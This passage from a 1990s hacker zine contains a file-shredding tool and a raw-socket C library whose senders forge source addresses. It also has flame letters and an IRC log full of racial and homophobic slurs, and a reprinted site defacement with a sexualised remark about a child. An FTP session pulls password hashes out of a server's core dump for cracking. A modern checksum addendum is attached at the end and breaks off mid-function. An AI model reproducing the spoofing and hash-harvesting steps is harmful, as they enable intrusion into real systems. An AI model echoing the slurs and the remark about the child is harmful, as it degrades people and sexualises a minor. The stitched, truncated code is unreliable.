 subscan.stdout.c  a scanner that sweeps a subnet for a given port.
                   (sprays output to stdout)
 http_ver.c        queries a web server and tries to find the server version.

--------------------------------------------------------------------------
0x0A - erase.c - chrak
--------------------------------------------------------------------------

/* erase.c - chrak
 * overwrites a file in place three times with bytes from /dev/urandom
 * (through a shared, writable mmap of the file), then unlinks it.
 * note: on a journaling or copy-on-write filesystem an in-place rewrite
 * is not guaranteed to land on the blocks that held the old data. */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>

off_t getflen(int);
void pexit(char *);

int main(int argc, char *argv[])
{
    unsigned char *buf;
    FILE *f, *r;
    int i1, c;
    off_t i, len;

    if (argc == 1) {
        printf("usage: %s file\ndestroys file -chrak\n", argv[0]);
        exit(-1);
    }
    if ((f = fopen(argv[1], "r+")) == NULL)
        pexit("fopen");
    if ((r = fopen("/dev/urandom", "r")) == NULL)
        pexit("fopen");
    len = getflen(fileno(f));
    if (len <= 0) {                     /* an empty file cannot be mmap()ed */
        fprintf(stderr, "nothing to erase\n");
        exit(-1);
    }
    if ((buf = mmap(0, len, PROT_READ | PROT_WRITE, MAP_SHARED,
                    fileno(f), 0)) == MAP_FAILED)
        pexit("mmap");
    for (i1 = 0; i1 < 3; i1++) {
        for (i = 0; i < len; i++) {
            if ((c = fgetc(r)) == EOF)
                pexit("fgetc");
            buf[i] = (unsigned char)c;
        }
        if (msync(buf, len, MS_SYNC) == -1)   /* push this pass out to disk */
            pexit("msync");
        printf("Finished pass %d\n", i1);
    }
    munmap(buf, len);
    fclose(f);
    fclose(r);
    if (remove(argv[1]) == -1)
        pexit("remove");
    return 0;
}

off_t getflen(int fd)
{
    struct stat str_stat;

    if (fstat(fd, &str_stat)) {
        perror("fstat");
        return -1;
    }
    return str_stat.st_size;
}

void pexit(char *s)
{
    perror(s);
    exit(-1);
}

--------------------------------------------------------------------------
0x0B - Commonly Written Network Functions for Linux/glibc
--------------------------------------------------------------------------

/* this is for glibc */
/* network functions v.01 by banana */
/* feel free to rip these and not give me credit.. the idea here is that
   you wont have to reinvent the wheel in your c0de or whatever.. */

#define _GNU_SOURCE                 /* sysv_signal(), struct iphdr */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <signal.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/pmap_clnt.h>
#include <rpc/pmap_prot.h>

#define DEBUG 0

/* SIGALRM handler shared by the functions below. it does nothing; its only
   job is to make a blocking read() return with EINTR when the alarm fires.
   (the original defined it as a nested function inside each caller, which
   is a gcc extension; one file-scope handler does the same thing) */
static void ret(int signo)
{
    (void)signo;
}

/* unsigned long int blah = lookup("www.microsoft.com");
   would put microsofts ip in blah ( net byte order ) */
unsigned long int lookup(char *hostname)
{
    struct hostent *name;
    unsigned long int address;

    if((address = inet_addr(hostname)) != INADDR_NONE)  /* already a dotted quad */
        return address;
    if( (name = gethostbyname(hostname)) == NULL)
        return -1;
    memcpy(&address, name->h_addr, name->h_length);
    return address;
}

char *rlookup(u_long ip)
{
    static char hostname[256];
    struct hostent *host;
    struct sockaddr_in addr;

    addr.sin_addr.s_addr = ip;
    if((host = gethostbyaddr((char *)&addr.sin_addr, sizeof(addr.sin_addr),
                             AF_INET)) == NULL) {
        /* no PTR record: hand back the dotted quad instead (the original
           fell through and dereferenced the NULL host pointer here) */
        snprintf(hostname, sizeof(hostname), "%s", inet_ntoa(addr.sin_addr));
        return hostname;
    }
    strncpy(hostname, host->h_name, sizeof(hostname) - 1);
    hostname[sizeof(hostname) - 1] = '\0';
    return hostname;
}

/* connect to a host, return a socket descriptor. */
int connect_to_host(unsigned long int ip, int port)
{
    struct sockaddr_in sheep;
    int sockfd, spare;

    if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        return -1;
    memset(&sheep, 0, sizeof(sheep));
    sheep.sin_port = htons(port);
    sheep.sin_family = AF_INET;
    sheep.sin_addr.s_addr = ip;
    if( (spare = connect(sockfd, (struct sockaddr *)&sheep, sizeof(sheep)) ) == -1) {
        close(sockfd);
        return -1;
    }
    return sockfd;
}

/* simple little finger client. ..
   printf("%s", finger(lookup("www.microsoft.com"), "jsbach")); */
char *finger(unsigned long int ip, char *user)
{
    int fd, n;
    static char buf[512];
    char send[512];

    snprintf(send, sizeof(send), "%s\r\n", user);   /* finger wants CRLF after the name */
    bzero(buf, sizeof(buf));
    if( (fd = connect_to_host(ip, 79)) == -1)
        return NULL;
    write(fd, send, strlen(send));
    if((n = read(fd, buf, sizeof(buf) - 1)) <= 0) {
        printf("unsuccessful read.\n");
        close(fd);
        return NULL;
    }
    buf[n] = '\0';
    close(fd);
    return buf;
}

/* send one icmp echo request to ip (network byte order) and wait up to ~5
   seconds for a datagram whose source is ip. returns 1 and copies the
   reply's ip header into *reply, 0 on timeout, -1 if the raw socket can't
   be opened (that needs root). ping() and getlocaladdr() below are both
   wrappers around this; the original carried two near-identical copies. */
static int echo_exchange(unsigned long int ip, struct iphdr *reply)
{
    struct iphdr echo;
    struct in_addr this_is_bs;
    /* predone icmphdr assembly ripped from nmap by fyodor:
       type 8 (echo request), code 0, checksum 0x8e85, id 0x697a,
       the rest of the 64 bytes zero */
    unsigned char ping[64] = { 0x8, 0x0, 0x8e, 0x85, 0x69, 0x7A };
    int sockfd;
    ssize_t n;
    time_t temp, temp1;
    struct sockaddr_in sheep;

    sysv_signal(SIGALRM, ret);      /* sysv semantics: read() is not restarted after the alarm */
    memset(&sheep, 0, sizeof(sheep));
    sheep.sin_family = AF_INET;
    sheep.sin_addr.s_addr = ip;     /* (there are no ports in icmp!) */
    if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1)
        return -1;
    n = sendto(sockfd, (char *)ping, sizeof(ping), 0,
               (struct sockaddr *)&sheep, sizeof(sheep));
    if (DEBUG == 1)
        printf("sendto ret in ping is %d!\n", (int)n);

    time(&temp);
    temp1 = temp + 5;
    while(temp < temp1) {
        bzero(&echo, sizeof(echo));
        alarm(4);
        /* on a raw socket read() hands us the ip header first, which is all we look at */
        n = read(sockfd, &echo, sizeof(echo));
        alarm(0);
        if(n <= 0)                  /* alarm fired (EINTR) or socket error */
            break;
        this_is_bs.s_addr = echo.saddr;
        if(DEBUG == 1)
            printf("Packet read. with src address %s.\n", inet_ntoa(this_is_bs));
        /* if we received a icmp echo packet from the host that
         * wasn't a response to our packet, it still means the host
         * is up ;) */
        if(echo.saddr == ip) {
            *reply = echo;
            close(sockfd);
            return 1;
        }
        time(&temp);
    }
    close(sockfd);
    return 0;
}

/* this function is used to check if a host is up
 * (duh) pass it the network byte ordered ip address to check. */
int ping(unsigned long int ip)
{
    struct iphdr reply;

    return echo_exchange(ip, &reply) == 1;
}

/* get our own local ip address by pinging another host and looking at
   the dest addr on the ICMP echo reply. */
unsigned long int getlocaladdr(unsigned long int ip)
{
    struct iphdr reply;

    if(echo_exchange(ip, &reply) == 1)
        return reply.daddr;
    return 0;
}

/* DUH */
unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
    register long sum;              /* assumes long == 32 bits */
    u_short oddbyte;
    register u_short answer;        /* assumes u_short == 16 bits */

    /*
     * Our algorithm is simple, using a 32-bit accumulator (sum),
     * we add sequential 16-bit words to it, and at the end, fold back
     * all the carry bits from the top 16 bits into the lower 16 bits.
     */
    sum = 0;
    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nbytes == 1) {
        oddbyte = 0;                                /* make sure top half is zero */
        *((u_char *) &oddbyte) = *(u_char *)ptr;    /* one byte only */
        sum += oddbyte;
    }

    /*
     * Add back carry outs from top 16 bits to low 16 bits.
     */
    sum = (sum >> 16) + (sum & 0xffff);     /* add high-16 to low-16 */
    sum += (sum >> 16);                     /* add carry */
    answer = ~sum;                          /* ones-complement, then truncate to 16 bits */
    return(answer);
}

/* make a telnet connection to the ip address. */
int telnetconnect (u_long ip)
{
    int sockfd, done = 0, test;
    u_char buf[4];

    if ((sockfd = connect_to_host (ip, 23)) == -1)
        return -1;

    /* terminal negotiation (bull)shit */
    while (!done) {
        bzero(buf, sizeof(buf));
        if (read (sockfd, buf, 1) != 1) {
            if(DEBUG) printf("coulndt read socket !@!@#$\n");
            close (sockfd);
            return 0;
        }
        if(DEBUG) printf("%x\n", *buf);
        if (*buf == 0xff) {      /* 0xff == "interpret as command" in telnet.. */
            if (DEBUG) printf ("switch to inband signalling !\n");
            test = read (sockfd, buf + 1, 2);     /* read in the 2 byte command.. */
            if (DEBUG) printf ("read %d more bytes !\n", test);
            if (*(buf + 1) == 253) {              /* 253 == "DO" in telnet. */
                *(buf + 1) = 252;                 /* 252 == "WONT" in telnet. */
                if(DEBUG) printf("replying with WONT %d\n", *(buf + 2));
                write (sockfd, buf, 3);
            }
        }
        /* first plain (non-IAC) byte means the negotiation is over */
        if((*(buf + 1) < (u_char)127) && (*(buf + 2) < (u_char)127) &&
           (*(buf + 3) < (u_char)127))
            return sockfd;
    }
    return sockfd;
}

/* i read the rpcinfo source c0de and it goes through a whole long thing
   creating a client and calling the portmapper.. maybe solaris doesnt
   have pmap_getmaps()? anyways, i decided to split up the rpc routines
   into 3 functions so that we'll only have to query the portmapper once
   for any given host.. rpcinfo() gets the portmap, checkrpc() searches
   the portmap list for a given service, and printrpc() prints the entire
   list ala rpcinfo:) */
struct pmaplist *rpcinfo (u_long host)
{
    struct sockaddr_in sheep;
    static struct pmaplist *head;    /* linked list returned by pmap_getmaps .. */

    memset(&sheep, 0, sizeof(sheep));
    sheep.sin_family = AF_INET;
    sheep.sin_port = htons (111);    /* sunrpc ;) */
    sheep.sin_addr.s_addr = host;
    head = pmap_getmaps (&sheep);
    return head;
}
/* that was easy =P */

int checkrpc (struct pmaplist *head, char *prog)
{
    struct rpcent *service;          /* for prognum -> ascii lookup */
    struct pmaplist *p;

    /* walk every mapping (the original advanced the pointer before looking
       at it, so it skipped the first entry and crashed on a one-entry list) */
    for (p = head; p != NULL; p = p->pml_next) {
        /* resolve the program number to a string */
        if ((service = getrpcbynumber (p->pml_map.pm_prog)) != NULL)
            if (strcmp (prog, service->r_name) == 0)
                return 1;
    }
    return 0;
}

int printrpc (struct pmaplist *head, u_long ip)
{
    struct rpcent *service;          /* for prognum -> ascii lookup */
    struct pmaplist *p;
    struct in_addr a;

    a.s_addr = ip;                   /* inet_ntoa() wants a struct in_addr, not a u_long */
    printf ("\n\n-** RPC services responding on host %s\n", inet_ntoa (a));
    if (head == NULL) {
        printf ("[ NONE ! ]\n");
        return 0;
    }
    for (p = head; p != NULL; p = p->pml_next) {
        /* resolve the program number to a string */
        if ((service = getrpcbynumber (p->pml_map.pm_prog)) != NULL)
            printf ("-** [prog. name -> %s] [port -> %lu(%s)] [vers. -> %lu]\n",
                    service->r_name, p->pml_map.pm_port,
                    (p->pml_map.pm_prot == 6) ? "tcp" : "udp",
                    p->pml_map.pm_vers);
    }
    return 0;
}

/* compare *reply with the received data after requesting some html =) */
int check_cgi(u_long host, char *path, char *reply)
{
    int sockfd, n;
    char sendstring[256], recvstring[1028];

    sysv_signal(SIGALRM, ret);
    snprintf(sendstring, sizeof(sendstring), "GET %s\r\n", path);  /* HTTP/0.9 style request */
    if((sockfd = connect_to_host(host, 80)) == -1)
        return 0;
    alarm(5);
    write(sockfd, sendstring, strlen(sendstring));
    n = read(sockfd, recvstring, sizeof(recvstring) - 1);
    alarm(0);
    close(sockfd);
    if(n <= 0)
        return 0;
    recvstring[n] = '\0';            /* strstr() needs a terminated string */
    if(strstr(recvstring, reply) != NULL)
        return 1;
    return 0;
}

/* .. *data limited to 1028 bytes, or this function will stack overflow
   (not good heh) */
/* REMEMBER TO ADD IN_CKSUM() .. IT IZ NECESSARY FOR ICMP */
int send_raw_icmp(u_long saddr, u_long daddr, u_short type, u_short code,
                  void *d4t4)
{
    int sockfd;
    struct sockaddr_in sheep;
    struct p4ck3t {
        struct iphdr ip;
        struct icmphdr icmp;
        char d4t4[1028];
    } p4ck3t;

    bzero(&p4ck3t, sizeof(p4ck3t));
    memset(&sheep, 0, sizeof(sheep));
    /* fillin ip header */
    sheep.sin_family = AF_INET;
    sheep.sin_addr.s_addr = daddr;
    p4ck3t.ip.saddr = saddr;
    p4ck3t.ip.daddr = daddr;
    p4ck3t.ip.ihl = 5;
    p4ck3t.ip.version = 4;
    p4ck3t.ip.tos = 0x0;
    p4ck3t.ip.id = 0xb4;
    p4ck3t.ip.protocol = IPPROTO_UDP;
    p4ck3t.ip.check = 0;                 /* the kernel does this for us */
    p4ck3t.ip.ttl = 255;
    p4ck3t.ip.tot_len = sizeof(40 + sizeof(d4t4));
    p4ck3t.icmp.code = code;
    p4ck3t.icmp.type = type;
    p4ck3t.icmp.checksum = in_cksum((unsigned short *)&p4ck3t.icmp,
                                    sizeof(struct icmphdr));
    memcpy(p4ck3t.d4t4, d4t4, sizeof(d4t4));
    if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        return -1;
    sendto(sockfd, &p4ck3t, sizeof(p4ck3t), 0, (struct sockaddr *)&sheep,
           sizeof(struct sockaddr_in));
    close(sockfd);
    return 0;
}

/* no-checksum raw UDP */
int send_raw_udp(u_long saddr /* network */, u_long daddr /* "" */,
                 u_short uh_sport /* host */, u_short uh_dport /* host */,
                 void *d4t4)
{
    struct udphdr {
        u_int16_t uh_sport;          /* source port */
        u_int16_t uh_dport;          /* destination port */
        u_int16_t uh_ulen;           /* udp length */
        u_int16_t uh_sum;            /* udp checksum */
    };
    int sockfd;
    struct sockaddr_in sheep;
    struct p4ck3t {
        struct iphdr ip;
        struct udphdr udp;
        char d4t4[1028];
    } p4ck3t;

    bzero(&p4ck3t, sizeof(p4ck3t));
    memset(&sheep, 0, sizeof(sheep));
    /* fillin ip header */
    sheep.sin_family = AF_INET;
    sheep.sin_addr.s_addr = daddr;
    sheep.sin_port = htons(uh_dport);
    p4ck3t.ip.saddr = saddr;
    p4ck3t.ip.daddr = daddr;
    p4ck3t.ip.ihl = 5;
    p4ck3t.ip.version = 4;
    p4ck3t.ip.tos = 0x0;
    p4ck3t.ip.id = 0xb4;
    p4ck3t.ip.protocol = IPPROTO_UDP;
    p4ck3t.ip.check = 0;                 /* the kernel does this for us */
    p4ck3t.ip.ttl = 255;
    p4ck3t.ip.tot_len = sizeof(40 + sizeof(d4t4));
    p4ck3t.udp.uh_sport = htons(uh_sport);
    p4ck3t.udp.uh_dport = htons(uh_dport);
    p4ck3t.udp.uh_ulen = htons(sizeof(struct udphdr) + sizeof(d4t4));
    memcpy(p4ck3t.d4t4, d4t4, sizeof(d4t4));
    if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
        return -1;
    sendto(sockfd, &p4ck3t, sizeof(p4ck3t), 0, (struct sockaddr *)&sheep,
           sizeof(struct sockaddr_in));
    close(sockfd);
    return 0;
}

--------------------------------------------------------------------------
0x0C - Network TIC TAC TOE
--------------------------------------------------------------------------

YES! network tic tac toe! this kept me occupied for hours prior to the release of this issue. br0ked code got you down? take a break and play this for a few hours. Compiles fine on BSD/Linux. see included nttt.c silly.

--------------------------------------------------------------------------
0x0D - P0ST4L M4DN3SS YO
--------------------------------------------------------------------------

To: george@b4b0.org
From: John Vranesevich

Greetings:

You and your group's "uber leet zine" are hardly in ANY position to be criticizing anyone else. The immaturity pouring out of that size and zine is astounding. Take a look in the mirror before you start putting down the work being done by others.

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

At 02:25 AM 10/10/98 -0400, you wrote:
>Below Is A Message From AntiOnline's Comment Form.
>---------------------------------------------------------------------------
>
>This form was submitted by: george@b4b0.org.
>Who runs the following website: www.b4b0.org
>And is the janitor in chief for b4b0 inc.
>You can email at:
> Submitted The Following Comments/Questions:
>
>uh your gay and a contradictive bastard.
>
>jorge.
>
>End Of Automated Message From AntiOnline
>

b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0

To: "George A. Krendle"
From: John Vranesevich

Greetings:

That little rant of yours sounded very much like you promote security through obscurity? Are you saying there's no value in posting exploits?
That's archaic thinking that the vast majority of professionals in the field, and groups like l0pht, would disagree with whole heartily.

You will see no childish flames about your little "group" on my site. As for any childish flames about me being posted in your zine. So be it. There's an old saying that goes something like "there's no such thing as bad publicity." More people see my site in a one minute time frame than will see your zine in an entire year. I must be doing something right, huh?

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0

To: "b4b0"
From: "Shredder Sledder"

b4b0,

Enclosed is a letter I wrote to John Vransevich right after his ignorant and uninformed "editorial" on script kiddies showed up on his web site. I had noticed that in a past issue of b4b0 that you had mentioned something about him not publishing letters that were negative about him, enlightened, and truthful as to what antionline is. I'd like to say that I've been ignored too. Here is what I wrote that pathetic loser, if you could share it with the rest of the world, justice would be served. JP didn't publish it in his last mailbag and frankly, somebody needs to slap some sense into that boy.

"John,

Maybe you should hand over your "editorials" and everything else you "publish" to an adult to proofread. Your constant misspellings and bad grammar make your "stories" appear to be written by an idiot. Also being a 19 year old college drop-out is no excuse. I know plenty of college drop-outs that can express themselves well. (Besides the journalists at wired laugh behind your back about your site when they read badly written stuff.)

This letter isn't about spelling however. Being older and a well paid computer professional is nice for me also (I have a life and stopped living at my parents house by the age of 18, Ahem!), but not my point.

I've got a little more depth in my viewpoint on hackers, a more historical and realistic one than you seem to have.

1) It is a riot to see you write things condemning "script kiddies" when:
   A) They are your sole source of news
   B) They form a majority of your "readership"
   &C) They probably understand a lot more about technical things than you do.

2) You have absolutely NO historical perspective about hackers. You seem to have failed to read even back issues of Phrack, much less other enlightening efforts such as FEH or possibly Citadel666. Have you ever read books such as "The Watchman" or "Out of the Inner Circle"? It would seem not. Do you have perspective on what people used to do, versus what they do now? Again - NO! Real hackers (except for Halflife and maybe some of the b4b0 guys) do not exist on Undernet. Have you ever heard of r00t? What about things that they and a number of other folks (some of the EFnet #hack crowd and others who don't IRC at all) did over the last 4-5 years? These people haven't left the "scene" entirely. In fact, most of them have well paying jobs. They, unlike you, publish half-decent quality technical information and can afford to fly to Defcon (again unlike you). In fact, these are the kind of guys who write their own drivers for linux and free BSD while taunting Shimomura on another phone line, maintain a presence on IRC, and work a real job. They frequently party with and travel to see friends they hang with on the net.

The problem isn't completely with all of the "script kiddies" out there. It is also with people like you, who claim to be above it all and yet are no different. Unfortunately for you, you don't know any better. Maybe when you talk to real hackers and educate yourself, you have something to say worth reading.

Sledder"

I'd like to remind JP that a Boutonniere of stupidity is something that an idiot like him can wear all day without the fear of it fading - Sledder

--------------------------------------------------------------------------
0x0E - B4B0 Headlines
--------------------------------------------------------------------------

10-28-98: www.rootshell.com g0t owned. they claim the introoderz gained access through sshd 1.2.26, but we all know thatz just a big joke right? letz take a look sh4ll we:

For all you lamers: Justin Foutts = p-wInd0wz = prym

To: BUGTRAQ@NETSPACE.ORG
Subject: SSHD Exploit
Please respond to Justin Foutts

On a system I administer I found a program named sshdwarez.c in one of my user's home directories. Upon further inspection I found that this was the source code of an x86/Linux remote buffer overflow exploit for sshd versions 1.2.26 and below. I have tested this exploit on a number of my systems and have obtained remote root access on each one. I will not post this exploit as it could give crackers a tool to gain unauthorized access to systems. I STRONGLY recommend that everyone upgrade their versions of sshd as soon as possible.

Thanks!
Justin

Start of p-wind0wz buffer: Tue Nov 03 21:25:41 1998
Session Ident: p-wInd0Wz (~p@HIHIHI.YOYOYO.ORG)
On a system I administer I found a program named sshdwarez.c in one of my user's home directories. Upon further inspection I found that this was the source code of an x86/Linux remote buffer overflow exploit for sshd versions 1.2.26 and below. I have tested this exploit on a number of my systems and have obtained remote root access on each one. I will not post this exploit as it could give crackers a tool to gain unauthorized access to systems.
I STRONGLY recommend that everyone upgrade their ve AHAHAHAHAHAHAHAHAHA you lame fuck [21:17] i rule [21:17] wait till u see the next post I wonder why aleph1 would even let that post [21:17] haha [21:17] me too [21:17] ive got like 200 mailz [21:18] it rulez [21:18] im replying to all the chix [21:19] mudge will posot about math bugs soon l33t [21:19] i dont think aleph1 forward my neext post [21:19] it ruled [21:19] "just joking about sshd guyz! gotcha!@" [21:19] heoahoa [21:19] oh man [21:19] i love bugtraq [21:20] tell everyone i sent u warez [21:20] and that they work perfectly [21:20] perpetu8 it ok werd!! tell them u sent it to me [21:21] tell who? everyone like i'm the only one who got them [21:22] i think everyone realizes its coomplete bullshit [21:22] it has been since the begining well [21:22] those rootshell people are so dumb ppl have been asking #2600 [21:22] dcc me.. dont be lying nigger [21:22] im auto banned from there [21:22] hahahahahah [21:22] man [21:22] everyoone is so dumb no i promised not to give it out [21:22] umm.. its me [21:23] tell him yyoiull give him warez if he gives up his religion End of p-wind0wz buffer Tue Nov 03 21:25:41 1998 HOHO. THATZ WHAT U THINK. -rw------- 1 qytpo qytpo 5095 Nov 6 15:11 ownsshd.c ok4y anyway, here iz a copy of the hacked webpage for h1st0rical reference. y0y0y0, u all m4y b w0nd3r1ng wh3r3 th3 k-sp1ff r00tsh3ll sYt3 w3nt. w3ll. 1t'z 4 l0ng st0rY.. s3v3r4l nYt3z ag0, eY3 l4y 1n b3d p0nd3r1ng. and wh4t wUz ey3 p0nd3r1ng, u a$k? eYe wUz th1nk1ng ab0Ut h0w kUt3 mY n3xt d0or n31ghb0r'z sm4ll m4l3 ch1ld l00k3d n4k3d. bUt m0$tly, eYe b3g4n t0 h4v3 d0UbtZ 4s t0 th3 r34s0n ph()r mY 3x1st3nc3... eYe wUz th1nking t0 mY$3lf..k1t, eY3 s3z t0 mY 0h-s0-v3ry-g4y s3lf, y 1z it that eY3 h4v3 b33n pUt 0n th1s 34rth? 1z lYph3 r1lly 4ll ab0Ut pr0v1d1ng bUgtr4q skr1Ptz ph0r k-l4m3 t4rdZ sUch 4z th3 HFG g1mpZ, kn0wn ph0r th31r ph34r$0m3 HTML t4GZ & ab1l1ty t0 c0nsUm3 sm4ll h3rdz 0f k0Wz 1n a s1ngl3 s1tt1ng? 1n sh0rt, n0. 
1'm g01ng t0 r3t1r3 4nd b3c0m3 a sc0Utm4zt3r, m4yb3 a m4l3 b4bys1tt3r. -k1t kn0x out p.s. 0h y4h, phr33 m1tn1ck. p.p.s. h3y u ant10nl1n3 f4gg0t w1th th3 fUnnY l4zt n4m3.. u'r3 n3xt. sh0ut 0uTz t0: MOD - Masters of Dropstat - 1m n0t sUr3 1ph 3y3 m34n th3 0ld M0D 0r th3 gNu 0n3. 1m n0t sUr3 th3r3'z a d1ff3r3nc3. BoW - Brotherhood of Webmasters - w3 lUv y0u. err n0, w3 h8 y0u. h3lp, 1m b1-p0l4r. TNo - The Newbie Order - v0yl4m3r 4nd d1s k4n sh4r3 c3llZ w1th m3rc ph0r th31r 1nd3x.htMl krYm3z HFG - Heavy Frightened Girliemen - sUr3ly th3 sUpr3m3 HTML j0ck3yZ 0f th3.. m0nth. l34rn1ng h0w t0 h1d3 str1nGz 1n '98!@# LOD - Legion of DOS - dir --help? fUk th1s shYt, l3tz n4rk 34ch 0th3r!@# r00t - 1ph y0u'r3 n0t 0wn3d bY r00t, 1nst4ll slAkw4r3 3.o 4nd lYk3, g1v3 uZ th3 r00t p4zZw3rd, n shYt. 0r 3lz3 w3'll b4n y00!@$ CDC - Cult 0f the Dum asCii - mUdg3 r1t3z w4r3z 4nd th3 r3zt 0f uZ w3rk 0n "h0w t0 bl0w Up th3 t01l3t p4rt ][ - app34r1ng 0n g3r4ld0." 0ur l1ghts1d3 h0M3b0yZ: Secure Networks Inc. - wh1t3 p0w3r r3j3kt g3tz r1ch 0ff 0f p4th3t1c n3rd w1th 1nf3r10r1ty k0mpl3x wh1l3 uZ1ng h1z skr1ptz t0 h4q .edUz 1n .ca. st0ry @ 11. ISS - wh3r3 th3 m41l sp00lZ & w4r3z r a m4tt3r 0f pUbl1k r3k0rd Tsutomu Shimomura - th4nx ph0r th3 C3ll K0d3zZ d00d!@# D.J. Bernstein - th4nx ph0r 8.9.1. Eric Allman - th4nx ph0r 8.9.1. w3'd g1v3 sUm r34l sh0Ut 0utz, bUt 3v3ry0n3 1n th3 sc3n3 1z fUqn g4y c0mp4r3d t0 uZ, 4nd 1t'd b s0mewh4t p01ntl3Zz t0 sh0Ut t0 0urs3lv3z. sm00ch. h3y. u d1dnt th1nk w3'd l34v3 y0U w1t n0 w4r3z, d1d y0u!?@ w3'r3 n0t l1k3 th4t.. h3r3'z th3 0-dAy: Exploits Browse 1998: July June May April March February January Browse 1997: December November October September August July and before - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - w0rd to this- i bet this core file is STILL on their root ftp dir. # ftp ftp29.netscape.com Connected to ftp29.netscape.com. 220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready. 
Name (ftp29.netscape.com:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome to the Netscape Communications Corporation FTP server.
230-
230-If you have any odd problems, try logging in with a minus sign (-)
230-as the first character of your password. This will turn off a feature
230-that may be confusing your ftp client program.
230-
230-Please send any questions, comments, or problem reports about
230-this server to ftp@netscape.com.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for *ls.
l--x--x--x   1 ftp      ftp           512 Aug 05  1997 bin -> /usr/bin
-rw-rw-rw-   1 ftp      ftp        363476 Oct 21 09:47 core
dr-xr-xr-x   1 ftp      ftp           512 Aug 05  1997 dev
d--x--x--x   1 ftp      ftp           512 Feb 05  1998 etc
drwxr-xr-x   1 ftp      ftp           512 Nov 04 14:34 pub
drwxr-xr-x   1 ftp      ftp           512 Aug 05  1997 usr
226 ASCII Transfer complete.
ftp> get core
local: core remote: core
200 PORT command successful.
150 Opening BINARY mode data connection for core (363476 bytes).
226 BINARY Transfer complete.
363476 bytes received in 3.72 seconds (97679 bytes/s)
ftp> quit
221 Goodbye.
# strings core|grep :::

h0h0. w3 h4ve 0ur network of 2000 p2-450'z cracking the root str1ng. fe4r. H0W3V3R it would be n1ce to know why ftpd dumped c0re in the first place.
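The in_cksum() routine in 0x0B, and the precomputed 0x8e 0x85 checksum bytes in its ping() request, are the RFC 1071 ones-complement checksum; the "REMEMBER TO ADD IN_CKSUM()" note there is the whole point. As an added example that is not code from the zine or from banana's library, here is the same algorithm used the way a receiver would use it: build an echo request with a properly computed checksum (reproducing the zine's precomputed bytes), validate an incoming ICMP message before trusting it, and handle the odd-length case. The function names rfc1071_cksum, build_echo_request and icmp_checksum_ok are my own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* RFC 1071 checksum, the same algorithm as in_cksum() in 0x0B: a 32-bit
 * accumulator over the 16-bit words as they sit in memory, a trailing odd
 * byte padded with a zero byte, carries folded back into the low 16 bits,
 * then the ones-complement. The result is already in memory byte order, so
 * it is copied into the packet with memcpy(), not htons(). */
uint16_t rfc1071_cksum(const void *data, size_t nbytes)
{
    const uint8_t *p = data;
    uint32_t sum = 0;
    uint16_t word;

    while (nbytes > 1) {
        memcpy(&word, p, 2);            /* no alignment assumption on p */
        sum += word;
        p += 2;
        nbytes -= 2;
    }
    if (nbytes == 1) {                  /* odd trailing byte, zero padded */
        word = 0;
        memcpy(&word, p, 1);
        sum += word;
    }
    sum = (sum >> 16) + (sum & 0xffff); /* fold the carries back in */
    sum += (sum >> 16);
    return (uint16_t)~sum;
}

/* Build an ICMP echo request (type 8, code 0) with id/seq in network byte
 * order and a correctly computed checksum. Returns the message length, or 0
 * if buf is too small. Hypothetical helper, not from the zine's library. */
size_t build_echo_request(uint8_t *buf, size_t buflen, uint16_t id,
                          uint16_t seq, const uint8_t *payload, size_t plen)
{
    uint16_t ck;
    size_t len = 8 + plen;

    if (buflen < len)
        return 0;
    memset(buf, 0, len);                /* checksum field is zero while summing */
    buf[0] = 8;                         /* ICMP_ECHO */
    buf[1] = 0;
    buf[4] = (uint8_t)(id >> 8);
    buf[5] = (uint8_t)(id & 0xff);
    buf[6] = (uint8_t)(seq >> 8);
    buf[7] = (uint8_t)(seq & 0xff);
    memcpy(buf + 8, payload, plen);
    ck = rfc1071_cksum(buf, len);
    memcpy(buf + 2, &ck, 2);            /* memory order: right on either endianness */
    return len;
}

/* Receiver side: a message whose checksum is intact sums to 0xffff, so the
 * complemented sum is 0. Anything else (corruption, or a crafted header
 * that skipped the checksum, which is what 0x0B warns about) is rejected. */
int icmp_checksum_ok(const uint8_t *pkt, size_t len)
{
    return len >= 8 && rfc1071_cksum(pkt, len) == 0;
}

/* Rebuild the 64-byte request ping() sends (id bytes 0x69 0x7a, seq 0, 56
 * zero payload bytes) and return its checksum bytes as they appear on the
 * wire, to compare against the zine's precomputed 0x8e 0x85. */
int page_ping_checksum_bytes(void)
{
    uint8_t buf[64], zeros[56];

    memset(zeros, 0, sizeof zeros);
    if (build_echo_request(buf, sizeof buf, 0x697a, 0, zeros, sizeof zeros) != 64)
        return -1;
    return (buf[2] << 8) | buf[3];
}

/* Flip one payload bit in a valid request and check that validation fails;
 * also round-trip an odd-length (9 byte) message. Returns 1 if both hold. */
int checksum_sanity(void)
{
    uint8_t buf[64], zeros[56], odd[16], one = 0xab;
    int ok;

    memset(zeros, 0, sizeof zeros);
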